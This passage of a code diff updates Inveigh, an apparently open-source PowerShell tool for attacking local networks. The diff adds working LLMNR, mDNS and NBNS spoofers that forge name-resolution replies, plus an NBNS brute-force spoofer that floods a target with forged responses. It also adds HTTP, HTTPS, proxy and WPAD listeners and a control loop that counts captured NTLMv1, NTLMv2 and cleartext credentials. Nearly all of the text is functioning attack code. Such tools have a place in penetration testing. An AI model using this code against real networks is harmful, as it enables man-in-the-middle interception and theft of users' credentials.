[IPAddress]"224.0.0.251" + $mDNS_UDP_client.JoinMulticastGroup($mDNS_multicast_group) + $mDNS_UDP_client.Client.ReceiveTimeout = 5000 + $mDNS_TTL_bytes = [System.BitConverter]::GetBytes($mDNSTTL) + [Array]::Reverse($mDNS_TTL_bytes) + + while($inveigh.running -and $mDNS_running) + { + + try + { + $mDNS_request_data = $mDNS_UDP_client.Receive([Ref]$mDNS_listener_endpoint) + } + catch + { + $mDNS_UDP_client.Close() + $mDNS_UDP_client = new-Object System.Net.Sockets.UdpClient 5353 + $mDNS_multicast_group = [IPAddress]"224.0.0.251" + $mDNS_UDP_client.JoinMulticastGroup($mDNS_multicast_group) + $mDNS_UDP_client.Client.ReceiveTimeout = 5000 + } + + if([System.BitConverter]::ToString($mDNS_request_data) -like '*-00-01-80-01') + { + $mDNS_response_packet = $mDNS_request_data[0,1] + + 0x84,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00 + + $mDNS_request_data[12..($mDNS_request_data.Length - 5)] + + 0x00,0x01,0x00,0x01 + + $mDNS_TTL_bytes + + 0x00,0x04 + + ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + + $mDNS_query_string = DataToString 13 $mDNS_request_data[12] $mDNS_request_data + $mDNS_query_string_full = $mDNS_query_string + ".local" + $source_IP = $mDNS_listener_endpoint.Address.IPAddressToString + + if(!$Inspect -and ($mDNS_request_data -and $mDNS_listener_endpoint.Address.IPAddressToString -ne '0.0.0.0') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $mDNS_query_string) -and ( + !$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $mDNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ( + $mDNSTypes -contains 'QU') -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP)) + { + $mDNS_destination_endpoint = New-Object Net.IPEndpoint($mDNS_listener_endpoint.Address,$mDNS_listener_endpoint.Port) + $mDNS_UDP_client.Connect($mDNS_destination_endpoint) + $mDNS_UDP_client.Send($mDNS_response_packet,$mDNS_response_packet.Length) + $mDNS_UDP_client.Close() + $mDNS_UDP_client = new-Object System.Net.Sockets.UdpClient 5353 + $mDNS_multicast_group = [IPAddress]"224.0.0.251" + $mDNS_UDP_client.JoinMulticastGroup($mDNS_multicast_group) + $mDNS_UDP_client.Client.ReceiveTimeout = 5000 + $mDNS_response_message = "- response sent" + } + else + { + + if($Inspect) + { + $mDNS_response_message = "- inspect only" + } + elseif($mDNSTypes -notcontains 'QU') + { + $mDNS_response_message = "- disabled mDNS type" + } + elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $mDNS_query_string) { - & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null + $mDNS_response_message = "- $mDNS_query_string is not on reply list" + } + elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $mDNS_query_string) + { + $mDNS_response_message = "- $mDNS_query_string is on ignore list" + } + elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP) + { + $mDNS_response_message = "- $source_IP is not on reply list" + } + elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP) + { + $mDNS_response_message = "- $source_IP is on ignore list" + } + elseif($inveigh.IP_capture_list -contains $source_IP) + { + $mDNS_response_message = "- previous capture from $source_IP" + } + else + { + $mDNS_response_message = "- something went wrong" + } + + } - try - { - $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine") - $certificate_store.Open('ReadWrite') - $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$false)[0] - $certificate_store.Remove($certificate) - $certificate_store.Close() - } - catch + if($mDNS_request_data) + { + $inveigh.console_queue.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message") + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message") + } + + } + + $mDNS_request_data = "" + } + elseif([System.BitConverter]::ToString($mDNS_request_data) -like '*-05-6C-6F-63-61-6C-00-00-01-00-01-*') + { + $mDNS_response_packet = $mDNS_request_data[0,1] + + 0x84,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00 + + $mDNS_request_data[12..($mDNS_request_data[12] + 12)] + + 0x05,0x6c,0x6f,0x63,0x61,0x6c,0x00 + + 0x00,0x01,0x00,0x01 + + $mDNS_TTL_bytes + + 0x00,0x04 + + ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + + $mDNS_query_string = DataToString 13 $mDNS_request_data[12] $mDNS_request_data + $mDNS_query_string_full = $mDNS_query_string + ".local" + $source_IP = $mDNS_listener_endpoint.Address.IPAddressToString + + if(!$Inspect -and ($mDNS_request_data -and $mDNS_listener_endpoint.Address.IPAddressToString -ne '0.0.0.0') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $mDNS_query_string) -and ( + !$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $mDNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ( + $mDNSTypes -contains 'QM') -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP)) + { + $mDNS_destination_endpoint = New-Object Net.IPEndpoint([IPAddress]"224.0.0.251",5353) + $mDNS_UDP_client.Connect($mDNS_destination_endpoint) + $mDNS_UDP_client.Send($mDNS_response_packet,$mDNS_response_packet.Length) + $mDNS_UDP_client.Close() + $mDNS_UDP_client = new-Object System.Net.Sockets.UdpClient 5353 + $mDNS_multicast_group = [IPAddress]"224.0.0.251" + $mDNS_UDP_client.JoinMulticastGroup($mDNS_multicast_group) + $mDNS_UDP_client.Client.ReceiveTimeout = 5000 + $mDNS_response_message = "- response sent" + } + else + { + + if($Inspect) + { + $mDNS_response_message = "- inspect only" + } + elseif($mDNSTypes -notcontains 'QM') + { + $mDNS_response_message = "- disabled mDNS type" + } + elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $mDNS_query_string) + { + $mDNS_response_message = "- $mDNS_query_string is not on reply list" + } + elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $mDNS_query_string) + { + $mDNS_response_message = "- $mDNS_query_string is on ignore list" + } + elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP) + { + $mDNS_response_message = "- $source_IP is not on reply list" + } + elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP) + { + $mDNS_response_message = "- $source_IP is on ignore list" + } + elseif($inveigh.IP_capture_list -contains $source_IP) + { + $mDNS_response_message = "- previous capture from $source_IP" + } + else + { + $mDNS_response_message = "- something went wrong" + } + + } + + if($mDNS_request_data) + { + $inveigh.console_queue.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message") + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message") + } + + } + + $mDNS_request_data = "" + } + + } + + $mDNS_UDP_client.Close() + } + +# Unprivileged NBNS Spoofer ScriptBlock +$NBNS_spoofer_scriptblock = +{ + param ($Inspect,$NBNS_response_message,$SpooferIP,$NBNSTypes,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$NBNSTTL) + + $NBNS_running = $true + $NBNS_listener_endpoint = New-Object System.Net.IPEndPoint ([IPAddress]::Broadcast,137) + + try + { + $NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137 + } + catch + { + $inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting NBNS spoofer") + $NBNS_running = $false + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting NBNS spoofer") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - Error starting NBNS spoofer") + } + + } + + $NBNS_UDP_client.Client.ReceiveTimeout = 5000 + $NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL) + [Array]::Reverse($NBNS_TTL_bytes) + + while($inveigh.running -and $NBNS_running) + { + + try + { + $NBNS_request_data = $NBNS_UDP_client.Receive([Ref]$NBNS_listener_endpoint) + } + catch + { + $NBNS_UDP_client.Close() + $NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137 + $NBNS_UDP_client.Client.ReceiveTimeout = 5000 + } + + $IP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address) + + if($NBNS_request_data -and [System.BitConverter]::ToString($NBNS_request_data[10..11]) -ne '00-01') + { + $NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL) + [Array]::Reverse($NBNS_TTL_bytes) + + $NBNS_response_packet = $NBNS_request_data[0,1] + + 0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 + + $NBNS_request_data[13..$NBNS_request_data.Length] + + $NBNS_TTL_bytes + + 0x00,0x06,0x00,0x00 + + ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + + 0x00,0x00,0x00,0x00 + + $source_IP = $NBNS_listener_endpoint.Address.IPAddressToString + $NBNS_query_type = [System.BitConverter]::ToString($NBNS_request_data[43..44]) + + switch ($NBNS_query_type) + { + + '41-41' + { + $NBNS_query_type = "00" + } + + '41-44' + { + $NBNS_query_type = "03" + } + + '43-41' + { + $NBNS_query_type = "20" + } + + '42-4C' + { + $NBNS_query_type = "1B" + } + + '42-4D' + { + $NBNS_query_type = "1C" + } + + '42-4E' + { + $NBNS_query_type = "1D" + } + + '42-4F' + { + $NBNS_query_type = "1E" + } + + } + + $NBNS_query = [System.BitConverter]::ToString($NBNS_request_data[13..($NBNS_request_data.Length - 4)]) + $NBNS_query = $NBNS_query -replace "-00","" + $NBNS_query = $NBNS_query.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $NBNS_query_string_encoded = New-Object System.String ($NBNS_query,0,$NBNS_query.Length) + $NBNS_query_string_encoded = $NBNS_query_string_encoded.Substring(0,$NBNS_query_string_encoded.IndexOf("CA")) + $NBNS_query_string_subtracted = "" + $NBNS_query_string = "" + $n = 0 + + do + { + $NBNS_query_string_sub = (([Byte][Char]($NBNS_query_string_encoded.Substring($n,1))) - 65) + $NBNS_query_string_subtracted += ([System.Convert]::ToString($NBNS_query_string_sub,16)) + $n += 1 + } + until($n -gt ($NBNS_query_string_encoded.Length - 1)) + + $n = 0 + + do + { + $NBNS_query_string += ([Char]([System.Convert]::ToInt16($NBNS_query_string_subtracted.Substring($n,2),16))) + $n += 2 + } + until($n -gt ($NBNS_query_string_subtracted.Length - 1) -or $NBNS_query_string.Length -eq 15) + + if(!$Inspect -and ($NBNS_request_data -and $NBNS_listener_endpoint.Address.IPAddressToString -ne '255.255.255.255') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $NBNS_query_string) -and ( + !$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $NBNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ( + $inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP) -and ($NBNSTypes -contains $NBNS_query_type) -and ($source_IP -ne $IP)) + { + $NBNS_destination_endpoint = New-Object System.Net.IPEndpoint($NBNS_listener_endpoint.Address,137) + $NBNS_UDP_client.Connect($NBNS_destination_endpoint) + $NBNS_UDP_client.Send($NBNS_response_packet,$NBNS_response_packet.Length) + $NBNS_UDP_client.Close() + $NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137 + $NBNS_UDP_client.Client.ReceiveTimeout = 5000 + $NBNS_response_message = "- response sent" + } + else + { + + if($Inspect) + { + $NBNS_response_message = "- inspect only" + } + elseif($NBNSTypes -notcontains $NBNS_query_type) + { + $NBNS_response_message = "- disabled NBNS type" + } + elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $NBNS_query_string) + { + $NBNS_response_message = "- $NBNS_query_string is not on reply list" + } + elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $NBNS_query_string) + { + $NBNS_response_message = "- $NBNS_query_string is on ignore list" + } + elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP) + { + $NBNS_response_message = "- $source_IP is not on reply list" + } + elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP) + { + $NBNS_response_message = "- $source_IP is on ignore list" + } + elseif($inveigh.IP_capture_list -contains $source_IP) + { + $NBNS_response_message = "- previous capture from $source_IP" + } + elseif($source_IP -eq $IP) + { + $NBNS_response_message = "- local request" + } + else + { + $NBNS_response_message = "- something went wrong" + } + + } + + if($NBNS_request_data) + { + $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message") + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message") + } + + } + + $NBNS_request_data = "" + } + + } + + $NBNS_UDP_client.Close() + } + +# NBNS BruteForce ScriptBlock +$NBNS_bruteforce_spoofer_scriptblock = +{ + param ($SpooferIP,$NBNSBruteForceHost,$NBNSBruteForceTarget,$NBNSBruteForcePause,$NBNSTTL) + + $NBNSBruteForceHost = $NBNSBruteForceHost.ToUpper() + + $hostname_bytes = 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41, + 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,0x00 + + $hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($NBNSBruteForceHost) + $hostname_encoded = [System.BitConverter]::ToString($hostname_encoded) + $hostname_encoded = $hostname_encoded.Replace("-","") + $hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($hostname_encoded) + $NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL) + [Array]::Reverse($NBNS_TTL_bytes) + + for($i=0; $i -lt $hostname_encoded.Count; $i++) + { + + if($hostname_encoded[$i] -gt 64) + { + $hostname_bytes[$i] = $hostname_encoded[$i] + 10 + } + else + { + $hostname_bytes[$i] = $hostname_encoded[$i] + 17 + } + + } + + $NBNS_response_packet = 0x00,0x00,0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 + + $hostname_bytes + + 0x00,0x20,0x00,0x01 + + $NBNS_TTL_bytes + + 0x00,0x06,0x00,0x00 + + ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + + 0x00,0x00,0x00,0x00 + + $inveigh.console_queue.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $NBNSBruteForceHost on $NBNSBruteForceTarget") + $NBNS_paused = $false + $NBNS_bruteforce_UDP_client = New-Object System.Net.Sockets.UdpClient(137) + $destination_IP = [System.Net.IPAddress]::Parse($NBNSBruteForceTarget) + $destination_point = New-Object Net.IPEndpoint($destination_IP,137) + $NBNS_bruteforce_UDP_client.Connect($destination_point) + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $NBNSBruteForceHost on $NBNSBruteForceTarget") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $NBNSBruteForceHost on $NBNSBruteForceTarget") + } + + while($inveigh.running) + { + + :NBNS_spoofer_loop while (!$inveigh.hostname_spoof -and $inveigh.running) + { + + if($NBNS_paused) + { + $inveigh.console_queue.Add("$(Get-Date -format 's') - Resuming NBNS brute force spoofer") + $NBNS_paused = $false + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Resuming NBNS brute force spoofer") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - Resuming NBNS brute force spoofer") + } + + } + + for ($i = 0; $i -lt 255; $i++) + { + + for ($j = 0; $j -lt 255; $j++) + { + $NBNS_response_packet[0] = $i + $NBNS_response_packet[1] = $j + $NBNS_bruteforce_UDP_client.send($NBNS_response_packet,$NBNS_response_packet.Length) + + if($inveigh.hostname_spoof -and $NBNSBruteForcePause) { + $inveigh.console_queue.Add("$(Get-Date -format 's') - Pausing NBNS brute force spoofer") + $NBNS_paused = $true + break NBNS_spoofer_loop - if($inveigh.status_output) + if($inveigh.file_output) { - $inveigh.console_queue.Add("SSL Certificate Deletion Error - Remove Manually") + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Pausing NBNS brute force spoofer") } - $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") - - if($inveigh.file_output) + if($inveigh.log_output) { - "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append + $inveigh.log.Add("$(Get-Date -format 's') - Pausing NBNS brute force spoofer") } - + } + + } + + } + + } + + Start-Sleep -m 5 + } + + $NBNS_bruteforce_UDP_client.Close() +} + +# Control Loop ScriptBlock +$control_scriptblock = +{ + param ($ConsoleQueueLimit,$NBNSBruteForcePause,$RunCount,$RunTime) + $inveigh.control = $true + + function StopInveigh + { + param ([String]$exit_message) + + if($inveigh.HTTPS -and !$inveigh.HTTPS_existing_certificate -or ($inveigh.HTTPS_existing_certificate -and $inveigh.HTTPS_force_certificate_delete)) + { + + try + { + $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine") + $certificate_store.Open('ReadWrite') + $certificates = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer}) + + ForEach($certificate in $certificates) + { + $certificate_store.Remove($certificate) } - - $inveigh.HTTP = $false - $inveigh.HTTPS = $false + + $certificate_store.Close() + } + catch + { + $inveigh.console_queue.Add("SSL Certificate Deletion Error - Remove Manually") + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") + } + + } + + } + + Start-Sleep -S 1 + $inveigh.console_queue.Add("Inveigh exited at $(Get-Date -format 's')") + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message") + } + + Start-Sleep -S 1 + $inveigh.running = $false + + if($inveigh.relay_running) + { + Start-Sleep -S 1 + $inveigh.console_queue.Add("Inveigh Relay exited due to $exit_message at $(Get-Date -format 's')") + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay exited due to $exit_message") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited due to $exit_message") + } + + Start-Sleep -S 1 + $inveigh.relay_running = $false + + } + + $inveigh.HTTPS = $false + } + + if($NBNSBruteForcePause) + { + $NBNS_pause = New-TimeSpan -Seconds $NBNSBruteForcePause + } + + $run_count_NTLMv1 = $RunCount + $inveigh.NTLMv1_list.Count + $run_count_NTLMv2 = $RunCount + $inveigh.NTLMv2_list.Count + $run_count_cleartext = $RunCount + $inveigh.cleartext_list.Count + + if($RunTime) + { + $control_timeout = New-TimeSpan -Minutes $RunTime + $control_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + } + + while($inveigh.running) + { + + if($NBNSBruteForcePause -and $inveigh.hostname_spoof) + { + + if($inveigh.NBNS_stopwatch.Elapsed -ge $NBNS_pause) + { + $inveigh.hostname_spoof = $false + } + + } + + if($RunCount) + { + + if($inveigh.NTLMv1_list.Count -ge $run_count_NTLMv1 -or $inveigh.NTLMv2_list.Count -ge $run_count_NTLMv2 -or $inveigh.cleartext_list.Count -ge $run_count_cleartext) + { + StopInveigh "run count" + } + + $run_count_NTLMv1 = $RunCount + $inveigh.NTLMv1_list.Count + $run_count_NTLMv2 = $RunCount + $inveigh.NTLMv2_list.Count + $run_count_cleartext = $RunCount + $inveigh.cleartext_list.Count + + } + + if($RunTime) + { + + if($control_stopwatch.Elapsed -ge $control_timeout) + { + StopInveigh "run time" } + } if($inveigh.file_output) { + while($inveigh.log_file_queue.Count -gt 0) { $inveigh.log_file_queue[0]|Out-File $inveigh.log_out_file -Append @@ -2043,35 +3814,38 @@ $sniffer_scriptblock = $inveigh.cleartext_file_queue.RemoveAt(0) } + while($inveigh.POST_request_file_queue.Count -gt 0) + { + $inveigh.POST_request_file_queue[0]|Out-File $inveigh.POST_request_out_file -Append + $inveigh.POST_request_file_queue.RemoveAt(0) + } + + } + + if(!$inveigh.console_output -and $ConsoleQueueLimit -ge 0) + { + + while($inveigh.console_queue.Count -gt $ConsoleQueueLimit -and !$inveigh.console_output) + { + $inveigh.console_queue.RemoveAt(0) + } + } + Start-Sleep -m 5 } - $binary_reader.Close() - $memory_stream.Dispose() - $memory_stream.Close() + $inveigh.control = $false } # End ScriptBlocks # Begin Startup Functions -# HTTP/HTTPS Listener Startup Function +# HTTP Listener Startup Function function HTTPListener() { - $inveigh.HTTP_listener = New-Object System.Net.HttpListener - - if($inveigh.HTTP) - { - $inveigh.HTTP_listener.Prefixes.Add('http://*:80/') - } - - if($inveigh.HTTPS) - { - $inveigh.HTTP_listener.Prefixes.Add('https://*:443/') - } - - $inveigh.HTTP_listener.AuthenticationSchemes = "Anonymous" - $inveigh.HTTP_listener.Start() + $proxy_listener = $false + $HTTPS_listener = $false $HTTP_runspace = [RunspaceFactory]::CreateRunspace() $HTTP_runspace.Open() $HTTP_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) @@ -2079,11 +3853,58 @@ function HTTPListener() $HTTP_powershell.Runspace = $HTTP_runspace $HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument( - $HTTPBasicRealm).AddArgument($HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument( - $HTTPDir).AddArgument($HTTPResponse).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null + $HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($HTTPIP).AddArgument($HTTPPort).AddArgument( + $HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument( + $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument( + $ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument( + $WPADAuthIgnore).AddArgument($WPADResponse) > $null $HTTP_powershell.BeginInvoke() > $null } +Start-Sleep -m 50 + +# HTTPS Listener Startup Function +function HTTPSListener() +{ + $proxy_listener = $false + $HTTPS_listener = $true + $HTTPS_runspace = [RunspaceFactory]::CreateRunspace() + $HTTPS_runspace.Open() + $HTTPS_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) + $HTTPS_powershell = [PowerShell]::Create() + $HTTPS_powershell.Runspace = $HTTPS_runspace + $HTTPS_powershell.AddScript($shared_basic_functions_scriptblock) > $null + $HTTPS_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument( + $HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($HTTPIP).AddArgument($HTTPSPort).AddArgument( + $HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument( + $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument( + $ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument( + $WPADAuthIgnore).AddArgument($WPADResponse) > $null + $HTTPS_powershell.BeginInvoke() > $null +} + +Start-Sleep -m 50 + +# Proxy Listener Startup Function +function ProxyListener() +{ + $proxy_listener = $true + $HTTPS_listener = $false + $proxy_runspace = [RunspaceFactory]::CreateRunspace() + $proxy_runspace.Open() + $proxy_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) + $proxy_powershell = [PowerShell]::Create() + $proxy_powershell.Runspace = $proxy_runspace + $proxy_powershell.AddScript($shared_basic_functions_scriptblock) > $null + $proxy_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument( + $HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($ProxyIP).AddArgument($ProxyPort).AddArgument( + $HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument( + $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument( + $ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument( + $WPADAuthIgnore).AddArgument($WPADResponse) > $null + $proxy_powershell.BeginInvoke() > $null +} + # Sniffer/Spoofer Startup Function function SnifferSpoofer() { @@ -2094,28 +3915,158 @@ function SnifferSpoofer() $sniffer_powershell.Runspace = $sniffer_runspace $sniffer_powershell.AddScript($shared_basic_functions_scriptblock) > $null $sniffer_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null - $sniffer_powershell.AddScript($sniffer_scriptblock).AddArgument($LLMNR_response_message).AddArgument( - $NBNS_response_message).AddArgument($IP).AddArgument($SpooferIP).AddArgument($SMB).AddArgument( - $LLMNR).AddArgument($NBNS).AddArgument($NBNSTypes).AddArgument($SpooferHostsReply).AddArgument( - $SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument($SpooferIPsIgnore).AddArgument( - $SpooferLearning).AddArgument($SpooferLearningDelay).AddArgument($SpooferLearningInterval).AddArgument( - $RunTime).AddArgument($LLMNRTTL).AddArgument($NBNSTTL) > $null + $sniffer_powershell.AddScript($sniffer_scriptblock).AddArgument($IP).AddArgument($LLMNR).AddArgument( + $LLMNR_response_message).AddArgument($LLMNRTTL).AddArgument($mDNS).AddArgument( + $mDNS_response_message).AddArgument($mDNSTypes).AddArgument($mDNSTTL).AddArgument( + $NBNS).AddArgument($NBNS_response_message).AddArgument($NBNSTypes).AddArgument($NBNSTTL).AddArgument( + $SMB).AddArgument($SpooferHostsIgnore).AddArgument($SpooferHostsReply).AddArgument( + $SpooferIP).AddArgument($SpooferIPsIgnore).AddArgument($SpooferIPsReply).AddArgument( + $SpooferLearning).AddArgument($SpooferLearningDelay).AddArgument($SpooferLearningInterval) > $null $sniffer_powershell.BeginInvoke() > $null } +# Unprivileged LLMNR Spoofer Startup Function +function LLMNRSpoofer() +{ + $LLMNR_spoofer_runspace = [RunspaceFactory]::CreateRunspace() + $LLMNR_spoofer_runspace.Open() + $LLMNR_spoofer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) + $LLMNR_spoofer_powershell = [PowerShell]::Create() + $LLMNR_spoofer_powershell.Runspace = $LLMNR_spoofer_runspace + $LLMNR_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null + $LLMNR_spoofer_powershell.AddScript($LLMNR_spoofer_scriptblock).AddArgument($Inspect).AddArgument( + $LLMNR_response_message).AddArgument($SpooferIP).AddArgument($SpooferHostsReply).AddArgument( + $SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument($SpooferIPsIgnore).AddArgument( + $LLMNRTTL) > $null + $LLMNR_spoofer_powershell.BeginInvoke() > $null +} + +# Unprivileged mDNS Spoofer Startup Function +function mDNSSpoofer() +{ + $mDNS_spoofer_runspace = [RunspaceFactory]::CreateRunspace() + $mDNS_spoofer_runspace.Open() + $mDNS_spoofer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) + $mDNS_spoofer_powershell = [PowerShell]::Create() + $mDNS_spoofer_powershell.Runspace = $mDNS_spoofer_runspace + $mDNS_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null + $mDNS_spoofer_powershell.AddScript($mDNS_spoofer_scriptblock).AddArgument($Inspect).AddArgument( + $mDNS_response_message).AddArgument($mDNSTTL).AddArgument($mDNSTypes).AddArgument($SpooferIP).AddArgument( + $SpooferHostsReply).AddArgument($SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument( + $SpooferIPsIgnore) > $null + $mDNS_spoofer_powershell.BeginInvoke() > $null +} + +# Unprivileged NBNS Spoofer Startup Function +function NBNSSpoofer() +{ + $NBNS_spoofer_runspace = [RunspaceFactory]::CreateRunspace() + $NBNS_spoofer_runspace.Open() + $NBNS_spoofer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) + $NBNS_spoofer_powershell = [PowerShell]::Create() + $NBNS_spoofer_powershell.Runspace = $NBNS_spoofer_runspace + $NBNS_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null + 